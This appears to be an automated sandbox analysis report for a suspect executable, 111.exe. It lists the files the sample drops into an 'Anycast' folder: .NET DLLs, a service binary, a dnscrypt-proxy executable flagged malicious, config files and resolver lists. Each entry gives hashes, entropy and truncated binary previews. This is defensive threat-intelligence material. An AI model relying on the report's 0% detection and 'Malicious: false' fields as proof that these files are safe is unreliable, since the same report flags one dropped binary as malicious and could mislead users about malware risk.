                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..Z...........x... ........... ....................................`..................................x..O....................h..p$...........w..T............................................ ............... ..H............text....X... ...Z.................. ..`.rsrc................\..............@..@.reloc...............f..............@..B.................x......H........%..p5..........P[.......w.......................................~....*..0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...(....*.(....,.r...p......%...%...%...(....*....(....*.(....,"r...p......%...%...%...%..

                                                                                                                            C:\Program Files (x86)\Anycast\System.Security.Permissions.dll

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):27752
                                                                                                                            Entropy (8bit):6.136081531591863
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:R8V7FxzsCggZ6L7snLa7SlfpmxjP/aFTWilWSZ/uPHRN7lImlOC:R47XzsCggQsW7Sl8xjP/QZpM
                                                                                                                            MD5:066B5E9A1FF681CEA20D3DEE597907E4
                                                                                                                            SHA1:B382B80CA629393DA72379C2EC0149E7639D498D
                                                                                                                            SHA-256:23B91C7E6E84AB983CC6E18DE4D60A06169A26EDA82FC01AE297DD014214A023
                                                                                                                            SHA-512:F755B25564017E7A7828253A1F9970972201C38082C2B1794465F45136F65D12288C5B88D69CF83B1FA631D202D2A1FAA807D21AE147172D150616B53422AF0C
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0............." ..0..>..........r]... ...`....... ..............................#F....`..................................]..O....`...............H..h$..........(\..T............................................ ............... ..H............text...x=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............F..............@..B................S]......H........#...2..........0U..x....[.......................................~....*..0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...(....*.(....,.r...p......%...%...%...(....*....(....*.(....,"r...p......%...%...%...%..

                                                                                                                            C:\Program Files (x86)\Anycast\System.Security.Principal.Windows.dll

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):18312
                                                                                                                            Entropy (8bit):6.439506871486808
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:cEwo6eTs14YY4cWpOW6dHRN7FYpJAlGspU:VwDdT463
                                                                                                                            MD5:BE2962225B441CC23575456F32A9CF6A
                                                                                                                            SHA1:9A5BE1FCF410FE5934D720329D36A2377E83747E
                                                                                                                            SHA-256:B4D8E15ADC235D0E858E39B5133E5D00A4BAA8C94F4F39E3B5E791B0F9C0C806
                                                                                                                            SHA-512:3F7692E94419BFFE3465D54C0E25C207330CD1368FCDFAD71DBEED1EE842474B5ABCB03DBA5BC124BD10033263F22DC9F462F12C20F866AEBC5C91EB151AF2E6
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....r..........." ..0.............V8... ...@....... ..............................!.....`..................................8..O....@...............$...#...`.......6..T............................................ ............... ..H............text...\.... ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B................68......H.......|!..............\4.. ...|6......................................:.(......}....*..{....*"..(....*"..(....*"..(....*..(....*..(....*..(....*..(....*:.(......}....*..{....*:.(......}....*..{....*:.(......}....*..{....*..(....*:.(......}....*..{....*^.(...........%...}....*:.(......}....*..{....*z.(......}...........%...}....*V.(......}......}....*..{....*..{....*..BSJB............v4.0.30319......l.......#~..@.......#Strings....8.......#US.<.......#GUID...L.......#Blob...

                                                                                                                            C:\Program Files (x86)\Anycast\System.Text.Encodings.Web.dll

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):68472
                                                                                                                            Entropy (8bit):5.977153039222987
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:1536:czy/zOmekrEZa8frFpd3hQi/+sBzFLknqPO:TzOmekwZa8zdR+sBpSYO
                                                                                                                            MD5:E8CDACFD2EF2F4B3D1A8E6D59B6E3027
                                                                                                                            SHA1:9A85D938D8430A73255A65EA002A7709C81A4CF3
                                                                                                                            SHA-256:EDF13EBF2D45152E26A16B947CD953AEB7A42602FA48E53FD7673934E5ACEA30
                                                                                                                            SHA-512:EE1005270305B614236D68E427263B4B4528AD3842057670FAD061867286815577EC7D3ED8176E6683D723F9F592ABCBF28D24935CE8A34571AB7F1720E2FFC5
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&gY..........." ..0.............2.... ........... .......................@............`.....................................O.......................x#... ..........T............................................ ............... ..H............text...8.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H........`..,t..................t.........................................(%...*..(%...*..(%...*^.(%......4...%...}....*:.(%.....}....*:.(%.....}....*:.(%.....}....*....0..E........ ...._.b..._X ....Y..e pp.._.d.X ....X.`.....X(&.....R...(&.....d.R*....0..K........ ...._.b..._X ....Y..e pp.._.d.X ....X.`.....X('.... ...._.S...('.....d.S*..0..&.........+....((...G...Z.(......X....()...2.*...0....................().....1...()....Z.6.....(...+.+...()....Z........s+..............

                                                                                                                            C:\Program Files (x86)\Anycast\System.Text.Json.dll

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):355720
                                                                                                                            Entropy (8bit):6.089400920308145
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3072:USOCU3QYmd1QhS1h2pCUoUJeXq7YAAEP1VIGm/0aW/49rZbpQ2M6R:Q7MQMh2pCUreatAJhrZlh
                                                                                                                            MD5:38470CA21414A8827C24D8FE0438E84B
                                                                                                                            SHA1:1C394A150C5693C69F85403F201CAA501594B7AB
                                                                                                                            SHA-256:2C7435257690AC95DC03B45A236005124097F08519ADF3134B1D1ECE4190E64C
                                                                                                                            SHA-512:079F7320CC2F3B97A5733725D3B13DFF17B595465159DAABCA5A166D39777100E5A2D9AF2A75989DFABDB2F29EAC0710E16C3BB2660621344B7A63C5DBB87EF8
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..@...........\... ...`....... ..............................84....`.................................Y\..O....`..d............J...#...........[..T............................................ ............... ..H............text....?... ...@.................. ..`.rsrc...d....`.......B..............@..@.reloc...............H..............@..B.................\......H..........t...........@....Y...[........................................(%...*..(%...*..(%...*^.(%..........%...}....*:.(%.....}....*:.(%.....}....*:.(%.....}....*....0..E........ ...._.b..._X ....Y..e pp.._.d.X ....X.`.....X(&.....R...(&.....d.R*....0..K........ ...._.b..._X ....Y..e pp.._.d.X ....X.`.....X('.... ...._.S...('.....d.S*..0..&.........+....((...G...Z.(......X....()...2.*...0..............?.....().....1...()....Z.......(...+.+...()....Z........s+..............

                                                                                                                            C:\Program Files (x86)\Anycast\System.Threading.Tasks.Extensions.dll

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):25984
                                                                                                                            Entropy (8bit):6.291520154015514
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:1R973o62/KqcAnb05J3w0I5eUGef8s72XBWdvVW2JW8aJcyHRN7WEimpplex:1RZ4nNxnYTb6Blha
                                                                                                                            MD5:E1E9D7D46E5CD9525C5927DC98D9ECC7
                                                                                                                            SHA1:2242627282F9E07E37B274EA36FAC2D3CD9C9110
                                                                                                                            SHA-256:4F81FFD0DC7204DB75AFC35EA4291769B07C440592F28894260EEA76626A23C6
                                                                                                                            SHA-512:DA7AB8C0100E7D074F0E680B28D241940733860DFBDC5B8C78428B76E807F27E44D1C5EC95EE80C0B5098E8C5D5DA4D48BCE86800164F9734A05035220C3FF11
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0..8...........V... ...`....... ....................................@..................................V..O....`...............B...#..........PU............................................... ............... ..H............text....6... ...8.................. ..`.rsrc........`.......:..............@..@.reloc...............@..............@..B.................V......H........0...$...................T........................................(....*..(....z..(....z2.(....s....*2.(....s....*:........o....*.~....*~.-..(......}......}......}....*~.-..(......}......}......}....*Z..}......}......}....*J.{....%-.&.*o....*^.u....,........(....*.*~.{.....{....3..{.....{......*.*&...(....*2...(.......*....0..'........{......,..u....%-.&..(...+(....*(....*n.{....,..(....s....*.q....*..0..a.........{....o0.....,;..{....o2...(......;...3.~.......s......

                                                                                                                            C:\Program Files (x86)\Anycast\System.ValueTuple.dll

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):78992
                                                                                                                            Entropy (8bit):6.056589052139225
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:1536:6784YWau8lqubx6WxXLA+o2SLFyEdux136ytgHo0AuresehSAPVGHMc:67NV8v36tI0XCKAt6
                                                                                                                            MD5:8C9424E37A28DB7D70E7D52F0DF33CF8
                                                                                                                            SHA1:81CD1ACB53D493C54C8D56F379D790A901A355AC
                                                                                                                            SHA-256:E4774AEAD2793F440E0CED6C097048423D118E0B6ED238C6FE5B456ACB07817F
                                                                                                                            SHA-512:CB6364C136F9D07191CF89EA2D3B89E08DB0CD5911BF835C32AE81E4D51E0789DDC92D47E80B7FF7E24985890ED29A00B0A391834B43CF11DB303CD980D834F4
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.Z.........." ..0.................. ... ....... .......................`............@.....................................O.... ..P................>...@......x................................................ ............... ..H............text........ ...................... ..`.rsrc...P.... ......................@..@.reloc.......@......................@..B........................H......................................................................6..o.........*f..o...........o.........*...o...........o...........o.........*...o...........o ..........o!...........o"........*...o#..........o$..........o%...........o&...........o'........*....0..L.........o(..........o)..........o*...........o+...........o,...........o-........*.0..Y.........o...........o/..........o0...........o1...........o2...........o3...........o4.... ...*....0..k.........o5....

                                                                                                                            C:\Program Files (x86)\Anycast\anycast-service.exe

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):5261392
                                                                                                                            Entropy (8bit):6.249805588164264
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:49152:SBkK77XNPBEZQGagb2tc526+YbAzNvoXO9dK+gMJ6TPiNM/B1V/OwKcB44HO6ObV:Ab77o3fgc5HhXAjC1/OkHO6Ob4/dJKl
                                                                                                                            MD5:6575F6D7E539BC890ACC7587AA0D2507
                                                                                                                            SHA1:4979FBE5AD1ECD1C684D8F08DE9CBA45AB8E6A62
                                                                                                                            SHA-256:5F92D54E009F53A8ECAB96AEE2621C76D12989595F52045A59030A62E6B6A37D
                                                                                                                            SHA-512:0CE7ABEB78312D2BF1573193249C3B9B09E01E374F6C7E2796B2062D53BE3328AB853BB97B4A4B596D1F9CCF38F0DE5DF84F9692CA84FA9A79ADE755933E4E2A
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........i.....................z.......z.......z.......z..............k........................z...............z......Rich............................PE..d.....{e.........."....&.$;..HI.....l.9........@..........................................`.................................................|.N.|............ ......."P.P&......$...`.M.T.....................M.(... .M.@............@;..............................text....#;......$;................. ..`.rdata...m...@;..n...(;.............@..@.data....o4...N.."....N.............@....pdata....... ........N.............@..@.reloc..$.............O.............@..B........................................................................................................................................................................................................................................................................

                                                                                                                            C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):8445440
                                                                                                                            Entropy (8bit):6.299224521901448
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:98304:cYFL0RmywyQ6j9vTWz6H2R5z46qWdwMpHuO:cSLYjHd2RyKwMp
                                                                                                                            MD5:9A040B1497076197702308784DE209A5
                                                                                                                            SHA1:0CD947406A209C3E9936B0510A71B6BF803D0DD7
                                                                                                                            SHA-256:CF3387316ACB5A73432E04269E02C362F477BC1D24C170EC13181FF1330B8A26
                                                                                                                            SHA-512:1AE36105CBEF8B9AA16C506E5963A41C2DCB6522530B87D06C966EC4BDC40AB869F9664C19B4679F108C3899DB45914F5B97BAD2D88DC2C4A684186D4FA4221C
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........................@...................y...@.......................................@...........................................................................................................................y..............................text.....@.......@................. ..`.rdata...g9.. @..h9...@.............@..@.data.........y......ry.............@....idata................}.............@....reloc................}.............@..B.symtab...............................B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                            C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.toml

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:ASCII text, with very long lines (466), with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):22107
                                                                                                                            Entropy (8bit):4.9908409732548265
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:CkqrlNCI6Fpp1vpOAQ8l99RSpLtIgFknkj4D+j75odulwgG8tA7JyK775Lv9+eIQ:AlFCpO8lV/OEeQb59XPEdulcI
                                                                                                                            MD5:095DC9DD7C5C54DB7E4F37632F037596
                                                                                                                            SHA1:7623E8467AA74310CA34995954164B291C43C383
                                                                                                                            SHA-256:1CA27A5CC74D92B7AC9A5B2112BC7227F614F19B670CCAF9CBE97FCDFA8B24B0
                                                                                                                            SHA-512:BFFA38F237D88F6DFC01A99D72124A60B71A5CD2A396F42A7B0DD0042C7E8CC7690C56561E83D1679BD4004554965D93DF6DBCEAF71DF5CB592CF0FC7ABE7B02
                                                                                                                            Malicious:false
                                                                                                                            Preview:..##############################################..# #..# dnscrypt-proxy configuration #..# #..##############################################....## This is an example configuration file...## You should adjust it to your needs, and save it as "dnscrypt-proxy.toml"..##..## Online documentation is available here: https://dnscrypt.info/doc........##################################..# Global settings #..##################################....## List of servers to use..##..## Servers from the "public-resolvers" source (see down below) can..## be viewed here: https://dnscrypt.info/public-servers..##..## The proxy will automatically pick working servers from this list...## Note that the require_* filters do NOT apply when using this setting...##..## By default, this list is empty and all registered servers matching the..## require_* filters will be used instead...##..## Remove the l

                                                                                                                            C:\Program Files (x86)\Anycast\dnscrypt\public-resolvers.md

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:Unicode text, UTF-8 text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):94934
                                                                                                                            Entropy (8bit):5.8119159997222605
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:768:qvt8OFCskNA4GAfSVPaU1xHDzxF29v8LA0YtdLna8tu9Tsw/ZrSW+7GOFIgttt5w:vrNA8c1xHDzHYfDa59Tsw9I7GOB1a
                                                                                                                            MD5:3D682368021B609D542143D0226FA806
                                                                                                                            SHA1:59A0B6106158C011100327FE55BBF091792ECDB1
                                                                                                                            SHA-256:F04C2D7A2C6D56D65C53FCD247F9FAFADF9747358252B105DAB72342FCE691FD
                                                                                                                            SHA-512:D5392797DA415346086A3B16E30F6E9A8FE7A5ECE951568BFAEDC0DCBAB0A92FED2862F8602BCD7AD5EAB18D57925A21C373CE2AF12C1A5ABDB246C380EC3981
                                                                                                                            Malicious:false
                                                                                                                            Preview:.# *** THIS LIST IS FOR OLD DNSCRYPT-PROXY VERSIONS ***..Version 2 of the list is for dnscrypt-proxy <= 2.0.42 users...If you are running up-to-date software, replace `/v2/` with `/v3/` in the sources URLs.of the `dnscrypt-proxy.toml` file (relevant lines start with `urls = ['https://...']`.and are present in the `[sources]` section)...THIS LIST IS AUTOMATICALLY GENERATED AS A SUBSET OF THE V3 LIST. DO NOT EDIT IT MANUALLY...If you want to contribute changes to a resolvers list, only edit files from the `v3` directory...--..## adfilter-adl..Hosted in Adelaide, Australia...Blocks ads, malware, trackers and more. No persistent logs. DNSSEC. No EDNS Client-Subnet...sdns://AgMAAAAAAAAADjE2My40Ny4xMTcuMTc2oMwQYNOcgym2K2-8fQ1t-TCYabmB5-Y5LVzY-kCPTYDmIEROvWe7g_iAezkh6TiskXi4gr1QqtsRIx8ETPXwjffOEGFkbC5hZGZpbHRlci5uZXQKL2Rucy1xdWVyeQ...## adfilter-adl-ipv6..Hosted in Adelaide, Australia...Blocks ads, malware, trackers and more. No persistent logs. DNSSEC. No EDNS Client-Subnet...sdns://AgMAAAAA

                                                                                                                            C:\Program Files (x86)\Anycast\dnscrypt\public-resolvers.md.minisig

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):307
                                                                                                                            Entropy (8bit):5.793647227842152
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:eRdIuXCAhgD55wVQYciyZ89F3dT1fs6wjkxDIueaReDMrWLtwGOskwRBXnHZJ1vn:IIktikeYTyaF3dT1fs6wGI/tfhwBskkj
                                                                                                                            MD5:5AB2C3AEAB6B7DCDE64CEE1C87AA23DB
                                                                                                                            SHA1:B6E83D2846ECBCD930B7A49A51112C825BDDFC72
                                                                                                                            SHA-256:5EA1D73A26C1D9EE963CEEFE77A77FCDDD1F02436C99CEBA849BCA53216E8E72
                                                                                                                            SHA-512:F54618176F06A471DFEBBAE0CE1685821141149054FB41F57EAB827941B0CFF71A41B61CD6C0721CE1C0BA392D4FE139EA6D7D2F6938C2D423D8EA4D132EEC8E
                                                                                                                            Malicious:false
                                                                                                                            Preview:untrusted comment: signature from minisign secret key.RWQf6LRCGA9i58Q3wUEEJAcU8+EZU6qzyOPBAtxiw1yGWD004BTGmeMi14egUthfFIEBtxvPKBn7nc/9AcQkn92BUOw1hFA9yAI=.trusted comment: timestamp:1697959499.file:public-resolvers.md.ft56r8DXsnkXqH+O7gnbEBZrsbAfnNJgqbchGuvC1pLkWSzGdlVHRPoPth0tDa4W7+gQU22JJbmYJGo1Qwx+Aw==.

                                                                                                                            C:\Program Files (x86)\Anycast\dnscrypt\relays.md

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):8891
                                                                                                                            Entropy (8bit):5.36050429229324
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:i74hL4c13hK/R7rCFGzo150D+/pcaxljIjIjYwjpOpkpChVVbnb/3mJOdkc:h4c13hK5rIGA57/hlcjIjYwQVbnbP2iX
                                                                                                                            MD5:002466CB724FC171392E7A7DB632F498
                                                                                                                            SHA1:1F674EE17E03B8080AA1FC0D69C249C75B755129
                                                                                                                            SHA-256:E982B752E04B6E4A2F0A66D11D2F5C28C333359D9A1E8321E0BE974785599ACD
                                                                                                                            SHA-512:A525A8331D2317F0A739F0A4B0743A6E7099834DF16A22AA635E15084C4D0C86A0747D1E88780FFCED5898B5EEE77C444B14F21C6EF614487904438EE0F12E4A
                                                                                                                            Malicious:false
                                                                                                                            Preview:.# *** THIS LIST IS FOR OLD DNSCRYPT-PROXY VERSIONS ***..Version 2 of the list is for dnscrypt-proxy <= 2.0.42 users...If you are running up-to-date software, replace `/v2/` with `/v3/` in the sources URLs.of the `dnscrypt-proxy.toml` file (relevant lines start with `urls = ['https://...']`.and are present in the `[sources]` section)...THIS LIST IS AUTOMATICALLY GENERATED AS A SUBSET OF THE V3 LIST. DO NOT EDIT IT MANUALLY...If you want to contribute changes to a resolvers list, only edit files from the `v3` directory...--..## anon-cs-austria..Wien, Austria Anonymized DNS relay server provided by https://cryptostorm.is/..sdns://gQ05NC4xOTguNDEuMjM1...## anon-cs-barcelona..Barcelona, Spain Anonymized DNS relay server provided by https://cryptostorm.is/..sdns://gQ4zNy4xMjAuMTQyLjExNQ...## anon-cs-belgium..Brussels, Belgium Anonymized DNS relay server provided by https://cryptostorm.is/..sdns://gQ0zNy4xMjAuMjM2LjEx...## anon-cs-berlin..Berlin, Germany Anonymized DNS relay server provided

                                                                                                                            C:\Program Files (x86)\Anycast\dnscrypt\relays.md.minisig

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):297
                                                                                                                            Entropy (8bit):5.821764972147527
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:eRdIuXCAhgD55wp+fHQTF06WKj5IuebuQHM5azCJdpdQo+y9KE:IIktikQfHQTFRT5I/ZXCTpd3+yV
                                                                                                                            MD5:3690AB9FA255B0E2E5EE794115AAD1F3
                                                                                                                            SHA1:C0FEAD6FEB2392F099EF3F909496FB3595AF97FF
                                                                                                                            SHA-256:0153C750C50AED8B810018F0662F311D2B91B65B4EA046F881380DDEBE8F5236
                                                                                                                            SHA-512:89E50AD3EE4605A00F1763B999719B2C6335E9E3B9CFCE67732DEBA08D287ED39DADE28F585A40EB3CD744E078351F1E29FF9A7A9B9C5A00CF2F5F9E511CC3F8
                                                                                                                            Malicious:false
                                                                                                                            Preview:untrusted comment: signature from minisign secret key.RWQf6LRCGA9i55vfGZ5ioNKE28otbb/OixYPbbf5UnEkW6Ni7t46t7wDhg0AbXFvBXV7HmXr9HC7wZ2wIxpNmlfCMqsa46ZH5Qc=.trusted comment: timestamp:1698396410.file:relays.md.ciVes4MWvLzRQI6xn6c0Yb+8pIyP18YQarxux7tqhj1fyMiEVWWKyKszJJCUYugiuFy8eWNTz3eD0r+lUOcwBg==.

                                                                                                                            C:\Program Files (x86)\Anycast\dnscrypt\sf-3tgo64xix5xqcykw.tmp

                                                                                                                            Download File
                                                                                                                            Process:C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):297
                                                                                                                            Entropy (8bit):5.7715779543787225
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:eRdIuXCAhgD55wPq31O2WRseCK4y9DhVC5IueMWRHM7wz1EMI3OdFC7JMV8JgZC:IIktikPqcXshfydhVC5I/t0wzyMh1V1Y
                                                                                                                            MD5:A093F9D5E647389ADEED88727CEA2F52
                                                                                                                            SHA1:65BF3AB5B23A4B48F854C3CF5E5E56F2BB52DCFD
                                                                                                                            SHA-256:A5891655DF1A53E200E43C6C97DD3C75305E8A2E3988CA2E26BD4EA7A88D8E42
                                                                                                                            SHA-512:1A4F619F9CA89D442DD3B386D0B980A8D29260680A736DD5A029D582B4A44AF7A3AC1119403DB06014BC7C189D6F132CB4894AF03B9BDEB1BD2E7020BD86FE8D
                                                                                                                            Malicious:false
                                                                                                                            Preview:untrusted comment: signature from minisign secret key.RWQf6LRCGA9i52PMsT2zxUvR1YpiEyI4oj0rz0YxQs4t5tuyv3EoOUhVyuOHxwJqoCnjKCCg8eqAcqC+hJlYHZBOt0g5zBLl0gI=.trusted comment: timestamp:1709489355.file:relays.md.a/TnausHWUSJRVLccL+Ua/RTk1ClSWdOZWYs9hst4aB/pnqsgnZdlXP1zcz4U8goY3TO021kKrtsy/cEqUBLDQ==.

                                                                                                                            C:\Program Files (x86)\Anycast\dnscrypt\sf-l7dekpjmyftaaxix.tmp

                                                                                                                            Download File
                                                                                                                            Process:C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            File Type:Unicode text, UTF-8 text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):111847
                                                                                                                            Entropy (8bit):5.819576509837085
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:1536:vrNAJW1xHDzLfkUjCFVTjNwFjs7GOpGmLXUXzbz:v6W1xHDzLfkUWLTjN4zbz
                                                                                                                            MD5:5CF07363FC1AC6FC38C720AD47B0A6FE
                                                                                                                            SHA1:531DDBD0FA57196E0AC4E85D5CDF1961F5057A93
                                                                                                                            SHA-256:36420F4AD8C4F1B238B9B878936E34F3F25E074A4FE6A87E9EE08E003D3D4C2D
                                                                                                                            SHA-512:734908BC8006BD70FD4DDE6436F2962ED7DBE8687ED1FCFF1E67822A6A8F5996FE9499AB83BA9EC827B5819BA38220EEF433CC5656017D8CCA50702C8928832D
                                                                                                                            Malicious:false
                                                                                                                            Preview:.# *** THIS LIST IS FOR OLD DNSCRYPT-PROXY VERSIONS ***..Version 2 of the list is for dnscrypt-proxy <= 2.0.42 users...If you are running up-to-date software, replace `/v2/` with `/v3/` in the sources URLs.of the `dnscrypt-proxy.toml` file (relevant lines start with `urls = ['https://...']`.and are present in the `[sources]` section)...THIS LIST IS AUTOMATICALLY GENERATED AS A SUBSET OF THE V3 LIST. DO NOT EDIT IT MANUALLY...If you want to contribute changes to a resolvers list, only edit files from the `v3` directory...--..## adfilter-adl..Hosted in Adelaide, Australia...Blocks ads, malware, trackers and more. No persistent logs. DNSSEC. No EDNS Client-Subnet...sdns://AgMAAAAAAAAADjE2My40Ny4xMTcuMTc2oMwQYNOcgym2K2-8fQ1t-TCYabmB5-Y5LVzY-kCPTYDmIEROvWe7g_iAezkh6TiskXi4gr1QqtsRIx8ETPXwjffOEGFkbC5hZGZpbHRlci5uZXQKL2Rucy1xdWVyeQ...## adfilter-adl-ipv6..Hosted in Adelaide, Australia...Blocks ads, malware, trackers and more. No persistent logs. DNSSEC. No EDNS Client-Subnet...sdns://AgMAAAAA

                                                                                                                            C:\Program Files (x86)\Anycast\dnscrypt\sf-psvfcjj4czdu3e3p.tmp

                                                                                                                            Download File
                                                                                                                            Process:C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            File Type:Unicode text, UTF-8 text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):37033
                                                                                                                            Entropy (8bit):5.440648130860915
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:AiG3Zg/oPp57/ZlcUKJbPXvacZ3E/x7RZsMslD1pf:E3cUyicZ3ycMslzf
                                                                                                                            MD5:7F6B42C1F52B6C0C4A2DCE82536F2F5D
                                                                                                                            SHA1:7731852037436C34221BF054C53AF964C56C9B70
                                                                                                                            SHA-256:750ED8F383BB045C3A3B78B6AEE9B7713C3BD32BBB34AA790069EE9510826790
                                                                                                                            SHA-512:3799ED6F19EB71058B444F43FA4054E70C0E0CA15F09FF5AD0732EE0881035B0FF6E23BC2479296B16D7A83A38BFF56A8B09A501D07FF26B1F383A44E45EBE6D
                                                                                                                            Malicious:false
                                                                                                                            Preview:.# *** THIS LIST IS FOR OLD DNSCRYPT-PROXY VERSIONS ***..Version 2 of the list is for dnscrypt-proxy <= 2.0.42 users...If you are running up-to-date software, replace `/v2/` with `/v3/` in the sources URLs.of the `dnscrypt-proxy.toml` file (relevant lines start with `urls = ['https://...']`.and are present in the `[sources]` section)...THIS LIST IS AUTOMATICALLY GENERATED AS A SUBSET OF THE V3 LIST. DO NOT EDIT IT MANUALLY...If you want to contribute changes to a resolvers list, only edit files from the `v3` directory...--..## anon-ams-ipv6..Anonymized DNS relay hosted in Amsterdam..sdns://gRpbMmEwYzpiOWMwOmY6NDUxZDo6MV06NDM0Mw...## anon-cs-austria..Wien, Austria Anonymized DNS relay server provided by https://cryptostorm.is/..sdns://gRE5NC4xOTguNDEuMjM1OjQ0Mw...## anon-cs-barcelona..Barcelona, Spain Anonymized DNS relay server provided by https://cryptostorm.is/..sdns://gRIzNy4xMjAuMTQyLjExNTo0NDM...## anon-cs-belgium..Brussels, Belgium Anonymized DNS relay server provided by https://

